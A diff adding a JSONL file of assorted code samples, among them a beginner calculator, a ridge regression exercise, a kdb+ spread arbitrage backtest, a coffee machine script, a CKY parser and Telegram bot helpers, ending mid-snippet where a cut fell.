diff --git "a/2465.jsonl" "b/2465.jsonl" new file mode 100644--- /dev/null +++ "b/2465.jsonl" @@ -0,0 +1,622 @@ +{"seq_id":"295800550","text":"print(\"Welcome to Gabriel's Function Calculator\")\n\nnum1 = int(raw_input(\"Give me a number please: \"))\nnum2 = int(raw_input(\"Give me another number please: \"))\n\ndef myAddFunction(add1, add2):\n sum = add1 + add2\n return sum\n\nprint(\"Here is the sum: \" + str(myAddFunction(num1, num2)))\n\n\n\ndef mySubtractFunction(sub1, sub2):\n dif = sub1 - sub2\n return dif\n\nprint(\"Here is the difference: \" + str(mySubtractFunction(num1, num2)))\n\n\n\ndef myMultFunction(mult1, mult2):\n product = mult1 * mult2\n return product\n\nprint(\"Here is the product: \" + str(myMultFunction(num1, num2)))\n","sub_path":"python/labs/functions-cardio/functionsCalculator.py","file_name":"functionsCalculator.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"290016478","text":"# %load q04_ridge/build.py\n# Default imports\nfrom sklearn.linear_model import Ridge\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom greyatomlib.advanced_linear_regression.q01_load_data.build import load_data\n\n# We have already loaded the data for you\ndata_set, X_train, X_test, y_train, y_test = load_data('data/house_prices_multivariate.csv')\n\nnp.random.seed(9)\n\n\n# Write your solution here\ndef ridge(alpha=0.01):\n model = Ridge(alpha,normalize=True,random_state=9)\n model.fit(X_train,y_train)\n y_pred_train = model.predict(X_train)\n y_pred_test = model.predict(X_test)\n \n mse_train=mean_squared_error(y_pred_train,y_train)\n mse_test=mean_squared_error(y_pred_test,y_test)\n \n rmse_train = mse_train**(0.5)\n rmse_test = mse_test**(0.5)\n \n var=(rmse_train,rmse_test,model)\n return var\n\n\n","sub_path":"q04_ridge/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"521835057","text":"import csv\n\nfrom pyash import Move\n\nmapping = {\n 'n°_de_transaction': 'id_transaction',\n}\n\n\ndef clean(v):\n v = v.lower().strip()\n for s, d in ((\"'\", ''), (' ', '_')):\n v = v.replace(s, d)\n return mapping.get(v, v)\n\n\ndef import_csv(filename):\n lines = []\n headers = []\n with open(filename, 'r') as fd:\n for line in csv.reader(fd):\n if not headers:\n headers = [clean(s) for s in line[:]]\n continue\n line = [l.decode('latin1') for l in line]\n line = dict(zip(headers, line))\n d = line['date'].split('/')\n line['date'] = '/'.join(reversed(d))\n line['amount'] = line['net']\n line['kind'] = 'Transfer'\n if line['avant_commission'] == '20,00':\n line['category'] = 'Cotisation'\n line['status'] = 'X'\n else:\n line['category'] = 'Other'\n line['status'] = 'P'\n line['description'] = line['nom']\n line['commission'] = line['commission'].strip('-')\n comment = (u'%(titre_de_lobjet)s\\n'\n u' Commission: %(avant_commission)s-%(commission)s\\n'\n u' Transaction Paypal: %(id_transaction)s\\n'\n ) % line\n line['comment'] = comment.strip()\n lines.append(((int(d) for i in d), line))\n for d, line in reversed(lines):\n print(Move.template.render(m=line).encode('utf8'))\n","sub_path":"pyash/paypal.py","file_name":"paypal.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"614803416","text":"import json\nimport os\nimport time\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List\n\nimport fdb\n\nfrom data_types import CdsRouteBus, CdsBaseDataProvider\n\ntry:\n import settings\n\n CDS_HOST = settings.CDS_HOST\n CDS_DB_PATH = settings.CDS_DB_PATH\n CDS_USER = settings.CDS_USER\n CDS_PASS = settings.CDS_PASS\n LOAD_TEST_DATA = settings.LOAD_TEST_DATA\nexcept ImportError:\n settings = None\n env = os.environ\n CDS_HOST = env['CDS_HOST']\n CDS_DB_PATH = env['CDS_DB_PATH']\n CDS_USER = env['CDS_USER']\n CDS_PASS = env['CDS_PASS']\n\n\nclass CdsDBDataProvider(CdsBaseDataProvider):\n CACHE_TIMEOUT = 30\n def __init__(self, logger):\n self.logger = logger\n self.cds_db = fdb.connect(host=CDS_HOST, database=CDS_DB_PATH, user=CDS_USER,\n password=CDS_PASS, charset='WIN1251')\n self.cds_db.default_tpb = fdb.ISOLATION_LEVEL_READ_COMMITED_RO\n\n def now(self) -> datetime:\n return datetime.now()\n\n def load_all_cds_buses(self) -> List[CdsRouteBus]:\n def make_names_lower(x):\n return {k.lower(): v for (k, v) in x.iteritems()}\n\n self.logger.debug('Execute fetch all from DB')\n start = time.time()\n try:\n with fdb.TransactionContext(self.cds_db.trans(fdb.ISOLATION_LEVEL_READ_COMMITED_RO)) as tr:\n cur = tr.cursor()\n cur.execute('''SELECT bs.NAME_ AS BUS_STATION_, rt.NAME_ AS ROUTE_NAME_, o.NAME_, o.OBJ_ID_, o.LAST_TIME_,\n o.LAST_LON_, o.LAST_LAT_, o.LAST_SPEED_, o.LAST_STATION_TIME_, o.PROJ_ID_\n FROM OBJECTS O JOIN BUS_STATIONS bs\n ON o.LAST_ROUT_ = bs.ROUT_ AND o.LAST_STATION_ = bs.NUMBER_\n JOIN ROUTS rt ON o.LAST_ROUT_ = rt.ID_\n WHERE obj_output_=0''')\n self.logger.debug('Finish execution')\n result = cur.fetchallmap()\n tr.commit()\n cur.close()\n end = time.time()\n self.logger.info(f\"Finish fetch data. Elapsed: {end - start:.2f}\")\n except fdb.fbcore.DatabaseError as db_error:\n self.logger.error(db_error)\n try:\n self.cds_db = fdb.connect(host=CDS_HOST, database=CDS_DB_PATH, user=CDS_USER,\n password=CDS_PASS, charset='WIN1251')\n self.cds_db.default_tpb = fdb.ISOLATION_LEVEL_READ_COMMITED_RO\n except Exception as general_error:\n self.logger.error(general_error)\n return []\n\n result = [CdsRouteBus(**make_names_lower(x)) for x in result]\n result.sort(key=lambda s: s.last_time_, reverse=True)\n end = time.time()\n self.logger.info(f\"Finish proccess. Elapsed: {end - start:.2f}\")\n return result\n\n\nclass CdsTestDataProvider(CdsBaseDataProvider):\n CACHE_TIMEOUT = 0.0001\n def __init__(self, logger):\n self.logger = logger\n self.test_data_files = []\n self.test_data_index = 0\n self.mocked_now = datetime.now()\n self.load_test_data()\n\n def load_test_data(self):\n self.test_data_files = sorted(Path('./test_data/').glob('codd_data_db*.json'))\n self.test_data_index = 0\n if self.test_data_files:\n path = self.test_data_files[0]\n self.mocked_now = datetime.strptime(path.name, \"codd_data_db%y_%m_%d_%H_%M_%S.json\")\n else:\n raise Exception(\"Cannot load test data from ./test_data/\")\n\n def now(self):\n if self.test_data_files and self.test_data_index >= len(self.test_data_files):\n self.test_data_index = 0\n path = self.test_data_files[self.test_data_index]\n self.mocked_now = datetime.strptime(path.name, \"codd_data_db%y_%m_%d_%H_%M_%S.json\")\n return self.mocked_now\n\n def next_test_data(self):\n if self.test_data_files and self.test_data_index >= len(self.test_data_files):\n self.test_data_index = 0\n path = self.test_data_files[self.test_data_index]\n self.mocked_now = datetime.strptime(path.name, \"codd_data_db%y_%m_%d_%H_%M_%S.json\")\n with open(path, 'rb') as f:\n long_bus_stops = [CdsRouteBus.make(*i) for i in json.load(f)]\n self.test_data_index += 1\n self.logger.info(f'Loaded {path.name}; {self.mocked_now:%H:%M:%S}')\n return long_bus_stops\n\n def load_all_cds_buses(self) -> List[CdsRouteBus]:\n return self.next_test_data()","sub_path":"data_providers.py","file_name":"data_providers.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"67582433","text":"import numpy as np\r\nimport statsmodels.api as sm\r\nfrom statsmodels.tsa.stattools import adfuller\r\nimport pandas as pd\r\nfrom scipy import stats\r\nfrom numpy import concatenate\r\nfrom pandas import DataFrame\r\nfrom qpython import qconnection\r\nconn = qconnection.QConnection('localhost')\r\nconn.open()\r\nday1=conn(r'''\r\nstring date where date>2018.05.31\r\n''',pandas=True)\r\nnumber=conn(r'''\r\ncount date where date>2018.05.31\r\n''',pandas=True)\r\nprint(day1[18].decode('utf-8'))\r\nprint(number)\r\ndf=DataFrame(np.ones((1,4),float,1),columns=['up','mean','down','res'])\r\ndef sca(day,sym1,sym2):\r\n conn(r'''\r\n getData: {[day;sym1;sym2]\r\n data1:select date,time:?[time>17:00;time-24:00;time],price1:price from futtick where date=day, symbol=sym1;\r\n data2:select date,time:?[time>17:00;time-24:00;time],price2:price from futtick where date=day, symbol=sym2;\r\n aj[`time;data2;data1]\r\n };\r\n ''')\r\n data=conn('getData[%s;%s;%s]'%(day,sym1,sym2),pandas=True)\r\n return data\r\n\r\nfor i in range(1,number,1):\r\n data1=sca(day1[i-1].decode('utf-8'),'`AP810','`AP812')\r\n datanext=sca(day1[i].decode('utf-8'),'`AP810','`AP812')\r\n data1=data1.values\r\n price1=data1[:,3]\r\n price2=data1[:,2]\r\n price1=np.array(price1,dtype='float')\r\n price2=np.array(price2,dtype='float')\r\n #线性回归增加常数项 y=kx+b\r\n price11=sm.add_constant(price1)\r\n # 进行最小二乘回归\r\n result = (sm.OLS(price2,price11)).fit()\r\n # 回归函数的常数项\r\n a=result.params[0]\r\n # 取得回归函数的参数项\r\n b=result.params[1]\r\n one=np.ones(((len(price1)),1),float)\r\n # 检验在时间窗口的长度下合约序列是否为协整\r\n result1 = sm.tsa.stattools.coint(price2, price1)\r\n # 取出并记录p值\r\n pvalue = result1[1]\r\n up=np.zeros(((len(price1)),1),float)\r\n down=np.zeros(((len(price1)),1),float)\r\n mean=np.zeros(((len(price1)),1),float)\r\n res1=np.zeros(((len(price1)),1),float)\r\n res0=price2 - b*price1 - a*one\r\n #res0=np.array(res0)\r\n if pvalue<0.05:\r\n backtest=True\r\n datanext=datanext.values\r\n price11=datanext[:,3]\r\n price22=datanext[:,2]\r\n price=np.ones((len(price11)),float,1)\r\n res1 = price22 - b*price11-a*price\r\n std = np.std(res0)\r\n mean = np.mean(res0)\r\n interval=stats.t.interval(0.95,len(res1)-1,mean,std)\r\n up_limit = interval[1]\r\n down_limit=interval[0]\r\n up=(price*up_limit).reshape(len(price),1)\r\n down=(price*down_limit).reshape(len(price),1)\r\n print(backtest)\r\n#以下为手动设置上下限以及止损线\r\n#up_limit=mean + entry * std\r\n#down_limit = mean - entry *std\r\n#up_out_limt=mean+out*std\r\n#down_out_limt=mean-out*std\r\n mean=(price*mean).reshape(len(price),1)\r\n res1=res1.reshape(len(price),1)\r\n data1=concatenate((up,mean),axis=1)\r\n data2= concatenate((data1,down),axis=1)\r\n data3= concatenate((data2,res1),axis=1)\r\n data3=DataFrame(data3,columns=['up','mean','down','res'])\r\n df=pd.concat([df,data3],axis=0)\r\nconn('{`data_m set x}', df)\r\nconn(r'''\r\ndata1:select datetime:date+time,date,time,price1:price,buy1,sell1 from futtick where date>2018.06.01,symbol=`AP810;\r\ndata2:select datetime:date+time,date,time,price2:price,bid1:buy1,ask1:sell1 from futtick where date>2018.06.01,symbol=`AP812;\r\ndata22:aj[`datetime;data2;data1];\r\ndata_m:1_data_m;\r\ndata_m1:data22 ^ data_m;\r\ndata_ming:update sig:-1 from data_m1 where res>up;\r\ndata_ming:update sig:1 from data_ming where res=res*prev res;\r\ndata_ming:update 0^fills sig from data_ming;\r\ndata_ming:update dif:price2-price1 from data_ming;\r\ndata_ming:update Ret:(prev sig)*(dif-(prev dif)) from data_ming; \r\ndata_ming:update k:1 from data_ming;\r\ndata_ming:update turnover:abs deltas sig from data_ming;\r\ndata_ming:update cost:((ask1-price2)+(price1-buy1)) from data_ming where (((prev sig)=0) and (sig=1));\r\ndata_ming:update cost:((price2-bid1)+(sell1-price1)) from data_ming where (((prev sig)=0) and (sig=-1));\r\ndata_ming:update cost:((price2-bid1)+(sell1-price1)) from data_ming where (((prev sig)=1) and (sig=0));\r\ndata_ming:update cost:((ask1-price2)+(price1-buy1)) from data_ming where (((prev sig)=-1) and (sig=0));\r\ndata_ming:update cost:0^cost from data_ming;\r\n''',pandas=True)\r\nconn(r'''\r\nfunct:{[begdate;enddate]\r\ntrade_indicator:select date,time,price1,price2,sig,dif,k,Ret,cost,turnover from data_ming where date within(begdate,enddate);\r\nhdq_CmRet1::select \r\n DailyRet:sum minRet , \r\n cm_ret:last cm_ret, \r\n number:sum k,\r\n turnover:sum turnover\r\nby date\r\nfrom (\r\n update cm_ret:sums minRet \r\n from (min_ret:select date,time,sig,turnover,k,\r\n minRet:0^log(1+((Ret-cost)%(price1+price2))) \r\n from (select date,time,sig,price1,price2,Ret,cost,k,turnover from trade_indicator)));\r\nhdq_test_result:select \r\n sharpe:(250*(avg DailyRet)) % ((sqrt 250)*(dev DailyRet)),\r\n annual_ret:250*(avg DailyRet), \r\n annual_vol :(sqrt 250)*(dev DailyRet),\r\n cum_ret: last cm_ret, \r\n maxdd: 1-exp neg max (maxs sums DailyRet)-(sums DailyRet), \r\n win_pro: (sum DailyRet>0) % ((sum DailyRet>0)+(sum DailyRet <0)),\r\n turnover_rate:(sum turnover)% (sum number)\r\n from hdq_CmRet1\r\n};\r\n''', pandas=True)\r\nresult=conn(r'''\r\nfunct[2018.06.01;2018.06.29]\r\n''',pandas=True)\r\nprint(result)","sub_path":"Calendar Spread Arbitrage.py","file_name":"Calendar Spread Arbitrage.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"562557611","text":"water = 400\nmilk = 540\nbeans = 120\ncups = 9\nmoney = 550\nmachine_phrase = \"The coffee machine has:\"\n\ndef display_machine():\n print(f\"{machine_phrase}\\n{water} of water\\n{milk} of milk\\n{beans} of beans\\n{cups} of cups\\n{money} of money\\n\\n\")\n\ndef select_action() -> str:\n return input('Write action (buy, fill, take, remaining, exit): ')\n \ndef pick_drink() -> int:\n print()\n response = input('What do you want to buy?'\n ' 1 - espresso,'\n ' 2 - latte,'\n ' 3 - cappuccino,'\n ' back - to main menu: ')\n if response == 'back':\n return 0\n return int(response)\n \ndef can_make(need_water=0, need_milk=0, need_beans=0):\n if water < need_water:\n print('Sorry, not enough water!\\n')\n return False\n if milk < need_milk:\n print('Sorry, not enough milk!\\n')\n return False\n if beans < need_beans:\n print('Sorry, not enough beans!\\n')\n return False\n if cups < 1:\n print('Sorry, not enough cups\\n')\n return False\n print('I have enough resources, making you a coffee!\\n')\n return True\n \ndef buy():\n global water, milk, beans, cups, money\n drink = pick_drink()\n if drink == 1: # espresso\n if can_make(need_water=250, need_beans=16):\n money += 4\n water -= 250\n beans -= 16\n cups -= 1\n elif drink == 2: # latte\n if can_make(need_water=350, need_milk=75, need_beans=20):\n money += 7\n water -= 350\n milk -= 75\n beans -= 20\n cups -= 1\n elif drink == 3: # cappuccino\n if can_make(need_water=200, need_milk=100, need_beans=12):\n money += 6\n water -= 200\n milk -= 100\n beans -= 12\n cups -= 1\n else:\n print(\"Invalid choice\")\n pass\n \ndef fill():\n global water, milk, beans, cups\n water += int(input('\\nWrite how many ml of water do you want to add:\\n'))\n milk += int(input('Write how many ml of milk do you want to add:\\n'))\n beans += int(input('Write how many grams of coffee beans do you want to add:\\n'))\n cups += int(input('Write how many disposable cups of coffee do you want to add:\\n'))\n print()\n\ndef take():\n global money\n print(f'\\nI gave you ${money}\\n')\n money = 0\n\ndef main():\n while True:\n action = select_action()\n\n if action == 'buy':\n buy()\n elif action == 'fill':\n fill()\n elif action == 'take':\n take()\n elif action == 'exit':\n break\n elif action == 'remaining':\n display_machine()\n else:\n print(\"Invalid option\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python/CoffeeMachine/Stage6.py","file_name":"Stage6.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"16900170","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pickle as pkl\r\nfrom scipy.stats import norm\r\n\r\nfrom BMfuncs import Modeldefs, Modeldyn\r\n\r\n# define a function that runs simulation with shift in tax rates\r\n# -----------------------------------------------------------------------------\r\ndef polsim(simargs):\r\n \r\n # unpack\r\n (initial, nobs, ts, funcname, args1, args2, params1, params2) = simargs\r\n '''\r\n Generates a history of k & ell with a switch in regime in period ts\r\n \r\n This function reads values from the following pkl files:\r\n ILAfindss.pkl - steady state values and parameters\r\n \r\n Inputs\r\n ----------- \r\n initial: list of values for k & z (k0, z0) in the first period.\r\n nobs: number of periods to simulate.\r\n ts: period in which the shift occurs.\r\n args1: is a list of arguments needed by the solution method in baseline.\r\n For example, with linearization these are:\r\n coeffs1: list of (PP, QQ, UU, RR, SS, VV) under the baseline regime.\r\n XYbar1: numpy array of X & Y SS values under the baseline regime.\r\n args2: is a list of arguments needed by the solution method after change \r\n params1: list of parameters under the baseline regime.\r\n params2: list of parameters under the new regime.\r\n \r\n Returns\r\n --------\r\n For the following variables x in (k, z, Y, w, r, T, c, i, u):\r\n xhist: history of simultated values\r\n xfhist: history of one-period-ahed forecasts\r\n MsqEerr: root mean squared Euler errors\r\n '''\r\n \r\n \r\n # -------------------------------------------------------------------------\r\n # READ IN VALUES FROM STEADY STATE CALCULATIONS\r\n \r\n # load steady state values and parameters\r\n infile = open('BMfindss.pkl', 'rb')\r\n (bar1, bar2, temp1, temp2, LINparams) = pkl.load(infile)\r\n infile.close()\r\n \r\n # unpack\r\n [kbar1, Ybar1, wbar1, rbar1, Tbar1, cbar1, ibar1, ubar1] = bar1\r\n [kbar2, Ybar2, wbar2, rbar2, Tbar2, cbar2, ibar2, ubar2] = bar2\r\n [alpha, beta, tau, rho_z, sigma_z] = params1\r\n (zbar, Zbar, NN, nx, ny, nz, logX, Sylv) = LINparams\r\n \r\n # set parameter values for calculating Euler errors\r\n npts = 10 # number of point for rectangular quadrature\r\n # generate discret support for epsilon to be used in Euler error\r\n # Eps are the central values\r\n # Phi are the associated probabilities\r\n Eps = np.zeros(npts);\r\n Cum = np.linspace(0.0, 1.0, num=npts+1)+.5/npts\r\n Cum = Cum[0:npts]\r\n Phi = np.ones(npts)/npts\r\n Eps = norm.ppf(Cum)\r\n\r\n \r\n # preallocate histories\r\n khist = np.zeros(nobs+1)\r\n zhist = np.zeros(nobs)\r\n Yhist = np.zeros(nobs)\r\n whist = np.zeros(nobs)\r\n rhist = np.zeros(nobs)\r\n Thist = np.zeros(nobs)\r\n chist = np.zeros(nobs)\r\n ihist = np.zeros(nobs)\r\n uhist = np.zeros(nobs)\r\n RMsqEerrhist = np.zeros((nobs, nx+ny))\r\n \r\n # preallocate forecast histories\r\n kfhist = np.zeros(nobs+2)\r\n zfhist = np.zeros(nobs+1)\r\n Yfhist = np.zeros(nobs+1)\r\n wfhist = np.zeros(nobs+1)\r\n rfhist = np.zeros(nobs+1)\r\n Tfhist = np.zeros(nobs+1)\r\n cfhist = np.zeros(nobs+1)\r\n ifhist = np.zeros(nobs+1)\r\n ufhist = np.zeros(nobs+1)\r\n \r\n # upack simulation parameters\r\n rho_z = params1[3] \r\n sigma_z = params1[4]\r\n \r\n # set starting values\r\n (khist[0], zhist[0]) = initial\r\n \r\n # generate history of random shocks\r\n for t in range(1, nobs):\r\n zhist[t] = rho_z*zhist[t-1] + sigma_z*np.random.normal(0., 1.)\r\n \r\n # generate histories for k and ell for the first ts-1 periods\r\n for t in range(0, ts-1):\r\n khist[t+1] = funcname(khist[t], zhist[t], args1)\r\n Yhist[t], whist[t], rhist[t], Thist[t], chist[t], ihist[t], \\\r\n uhist[t] = Modeldefs(khist[t+1], khist[t], zhist[t], \\\r\n params1)\r\n \r\n # get 1-period ahead forecasts\r\n if t < ts-2: # use baseline model for predictions\r\n zfhist[t+1] = rho_z*zhist[t]\r\n kfhist[t+2] = funcname(khist[t+1], zfhist[t+1], \\\r\n args1)\r\n Yfhist[t+1], wfhist[t+1], rfhist[t+1], Tfhist[t+1], cfhist[t+1], \\\r\n ifhist[t], ufhist[t] = Modeldefs(kfhist[t+2], khist[t+1], \\\r\n zfhist[t+1], params1)\r\n \r\n # begin loop over possible values of shock next period for Euler errors\r\n MsqEerr = np.zeros(nx + ny)\r\n for i in range(0, npts):\r\n # find value of next period z\r\n zp = rho_z*zhist[t] + sigma_z*Eps[i]\r\n # find the value of k in two periods\r\n kpp = funcname(khist[t+1], zp, args1)\r\n # find the Euler errors\r\n invec = (kpp, khist[t+1], khist[t], zp, zhist[t])\r\n Eerr = Phi[i]*Modeldyn(invec, params1)\r\n MsqEerr = 1/(1+i) * Eerr**2 + i/(1+i) * MsqEerr\r\n RMsqEerrhist[t,:] = MsqEerr**.5\r\n\r\n else: # use change model for predictions\r\n zfhist[t+1] = rho_z*zhist[t]\r\n kfhist[t+2] = funcname(khist[t+1], zfhist[t+1], \\\r\n args2)\r\n Yfhist[t+1], wfhist[t+1], rfhist[t+1], Tfhist[t+1], cfhist[t+1], \\\r\n ifhist[t], ufhist[t] = Modeldefs(kfhist[t+2], khist[t+1], \\\r\n zfhist[t+1], params2)\r\n \r\n # begin loop over possible values of shock next period for Euler errors\r\n MsqEerr = np.zeros(nx + ny)\r\n for i in range(0, npts):\r\n # find value of next period z\r\n zp = rho_z*zhist[t] + sigma_z*Eps[i]\r\n # find the value of k in two periods\r\n kpp = funcname(khist[t+1], zp, args1)\r\n # find the Euler errors\r\n invec = (kpp, khist[t+1], khist[t], zp, zhist[t])\r\n Eerr = Phi[i]*Modeldyn(invec, params2)\r\n MsqEerr = 1/(1+i) * Eerr**2 + i/(1+i) * MsqEerr\r\n RMsqEerrhist[t,:] = MsqEerr**.5\r\n\r\n # generate histories for k and ell for the remaning periods \r\n for t in range(ts-1, nobs):\r\n khist[t+1] = funcname(khist[t], zhist[t], args2)\r\n Yhist[t], whist[t], rhist[t], Thist[t], chist[t], ihist[t], \\\r\n uhist[t] = Modeldefs(khist[t+1], khist[t], zhist[t], \\\r\n params2)\r\n \r\n # get 1-period ahead forecasts\r\n zfhist[t+1] = rho_z*zhist[t]\r\n kfhist[t+2] = funcname(khist[t+1], zfhist[t+1], args2)\r\n Yfhist[t+1], wfhist[t+1], rfhist[t+1], Tfhist[t+1], cfhist[t+1], \\\r\n ifhist[t], ufhist[t] = Modeldefs(kfhist[t+2], khist[t+1], \\\r\n zfhist[t+1], params2)\r\n \r\n # begin loop over possible values of shock next period for Euler errors\r\n MsqEerr = np.zeros(nx + ny)\r\n for i in range(0, npts):\r\n # find value of next period z\r\n zp = rho_z*zhist[t] + sigma_z*Eps[i]\r\n # find the value of k in two periods\r\n kpp = funcname(khist[t+1], zp, args1)\r\n # find the Euler errors\r\n invec = (kpp, khist[t+1], khist[t], zp, zhist[t])\r\n Eerr = Phi[i]*Modeldyn(invec, params2)\r\n MsqEerr = 1/(1+i) * Eerr**2 + i/(1+i) * MsqEerr\r\n RMsqEerrhist[t,:] = MsqEerr**.5\r\n \r\n \r\n return khist, zhist, Yhist, whist, rhist, Thist, chist, ihist, \\\r\n uhist, kfhist, zfhist, Yfhist, wfhist, rfhist, Tfhist, \\\r\n cfhist, ifhist, ufhist, RMsqEerrhist","sub_path":"BrockMirman/BMpolsim.py","file_name":"BMpolsim.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"637321022","text":"import sys\nsys.path.append('..')\nfrom utils.data import load_text\nfrom collections import defaultdict\nfrom math import log\nfrom nltk.tree import Tree\n\ndef load_grammar(fname = '../../test/08-grammar.txt'):\n terms = defaultdict(list)\n nonterms = []\n for parent, children, prob in load_text(fname, '\\t'):\n children = tuple(children.split(' '))\n entropy = -log(float(prob))\n\n # separate rule by length\n if len(children) == 1:\n terms[children[0]].append((parent, entropy))\n else:\n nonterms.append((parent, entropy) + children )\n return terms, nonterms\n\ndef unk(terms):\n # unlike n_gram model calculate prob by counting\n # unk probability is given by the grammar\n # whose entropy cannot be smoothed by interpolating\n unk_entropy = defaultdict(list)\n sum_entropy = 0\n for child, possible_parents in terms.items():\n for parent, entropy in possible_parents:\n unk_entropy[parent].append(entropy)\n sum_entropy += entropy\n\n # give unk an average entropy over all syms\n for parent, entropys in unk_entropy.items():\n # list of entropy -> entropy\n unk_entropy[parent] = sum(entropys) / sum_entropy\n *unk_entropy, = zip(unk_entropy.keys(), unk_entropy.values())\n\n # for unk (shared_parents, average entropy)\n terms.default_factory = (lambda: unk_entropy)\n\ndef bottom_up_ij(length):\n coverage = 1\n while coverage <= length:\n step = coverage - 1\n while step >= 0:\n # plus 1 for pythonic consistency in slicing & ranging\n yield step, coverage + 1\n step -= 1\n coverage += 1\n\ndef bottom_up(tokens, grammar):\n\n terms, nonterms = grammar\n entropy_bag = {}\n local_best_coverage = {}\n\n # terms bottom\n for i, tok in enumerate(tokens):\n # 'a' can be [noun letter 'a', det, ...]\n for child, entropy in terms[tok]:\n entropy_bag[(child, i, i + 1)] = entropy\n\n # nonterms up\n for i, j in bottom_up_ij(len(tokens)):\n for k in range(i+1, j):\n # try every grammar!\n for parent, entropy, lchild, rchild in nonterms:\n ij = (parent, i, j)\n ik = (lchild, i, k)\n kj = (rchild, k, j)\n if (ik in entropy_bag) and (kj in entropy_bag):\n ij_entropy = entropy_bag[ik] + entropy_bag[kj] + entropy\n if (ij not in entropy_bag) or (ij_entropy < entropy_bag[ij]):\n entropy_bag[ij] = ij_entropy\n local_best_coverage[ij] = (ik, kj)\n final_coverage = ij\n return local_best_coverage, final_coverage\n\ndef top_down(local_best_coverage, tokens, ij, level = 0):\n\n postag, i, _ = ij\n indent = ' ' * level\n if ij in local_best_coverage:\n # nonterms\n ik, kj = local_best_coverage[ij]\n ik_str = top_down(local_best_coverage, tokens, ik, level + 1)\n kj_str = top_down(local_best_coverage, tokens, kj, level + 1)\n return '%s%s (\\n%s \\n%s\\n%s)' % (indent, postag, ik_str, kj_str, indent)\n else:\n # terms\n return \"%s[%s '%s']\" % (indent, postag, tokens[i])\n\n\nif __name__ == '__main__':\n grammar = load_grammar('../../test/08-grammar.txt')\n for tokens in load_text('../../test/08-input.txt'):\n coverage_bag, root = bottom_up(tokens, grammar)\n s = top_down(coverage_bag, tokens, root)\n print(s)\n Tree.fromstring(s).draw()\n","sub_path":"zchen/tutorial10/10.cky.py","file_name":"10.cky.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"608273352","text":"import json\n\nfrom tdl.util import Util\n\n\nclass Request:\n\n def __init__(self, method, params, id_):\n self.method = method\n self.params = params\n self.id = id_\n\n def get_audit_text(self):\n return 'id = {id}, req = {method}({params})'.format(\n id=self.id,\n method=self.method,\n params=', '.join(list([Util.compress_text(x) for x in self.params])))\n\n @staticmethod\n def deserialize(message_json, audit):\n try:\n decoded_message = json.loads(message_json)\n return Request(\n decoded_message['method'],\n decoded_message['params'],\n decoded_message['id'])\n except:\n audit.log_line('Invalid message format')\n raise\n","sub_path":"src/tdl/queue/abstractions/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"527914069","text":"import datetime\n\nfrom aiogram import types, Bot\nfrom aiogram.types import PhotoSize\n\nfrom models import db\n\n\ndef get_full_user_name(message: types.Message) -> str:\n \"\"\"get user fullname from message\"\"\"\n if message.from_user:\n pre_fn = message.from_user.first_name\n pre_ln = message.from_user.last_name\n first_name = pre_fn if pre_fn else ' '\n last_name = pre_ln if pre_ln else ' '\n return f'{first_name} {last_name}'\n else:\n return ''\n\n\ndef get_event(callback):\n event_id = get_id_from_data(callback.data, 1)\n event = db.get_from_db_multiple_filter(db.Event, [db.Event.id == event_id])\n if isinstance(event, db.Event):\n return event\n\n\ndef retrieve_message_unique_id(message: types.Message, bot: Bot):\n photo = message.photo[0]\n assert isinstance(photo, PhotoSize)\n # solved send photo.file_id\n photo_file_id = photo.file_id\n return photo_file_id\n\n\ndef try_get_date_from_str(from_date, date_format):\n # upper_bound date to include current day\n try:\n date_from = datetime.datetime.strptime(from_date, date_format)\n if date_from < datetime.datetime.now():\n # if start day bigger than end_date raise error\n raise ValueError()\n except ValueError as e:\n return None\n else:\n return date_from\n\n\ndef get_id_from_data(data: str, index):\n \"\"\"\n get id from data\n :param data: data from callback\n :param index: index of information\n \"\"\"\n assert ':' in data\n return data.split(':')[index]\n\n\ndef format_hast(first_chat_id, second_chat_id, event_id):\n \"\"\"generate chat_hash\"\"\"\n return f\"{first_chat_id}-{second_chat_id}-{event_id}\"\n\n\ndef check_hash_valid(chat_hash1, chat_hash2):\n \"\"\"\n check if two users in one chat\n chat hash consist 1 chat id, 2 chat id and event id\n :param chat_hash1: chat_id of first user\n :param chat_hash2: chat_id of second user\n :return:\n \"\"\"\n if chat_hash1 is None or chat_hash2 is None:\n return False\n chat11, chat12, event_id1 = chat_hash1.split('-')\n chat21, chat22, event_id2 = chat_hash2.split('-')\n\n in_chat = sorted([chat11, chat12]) == sorted([chat21, chat22]) and event_id1 == event_id2\n return in_chat\n\n","sub_path":"utils/useful_methods.py","file_name":"useful_methods.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"377578172","text":"# Problem from UVA\n# https://onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=3649\n\n\nclass Triad:\n def __init__(self, source, target, weight):\n self.source = source\n self.target = target\n self.weight = weight\n\n\nparent = []\nranks = []\ndist = []\ngraph = []\n\n\ndef make_set(V):\n global parent, ranks, dist\n parent = [i for i in range(V + 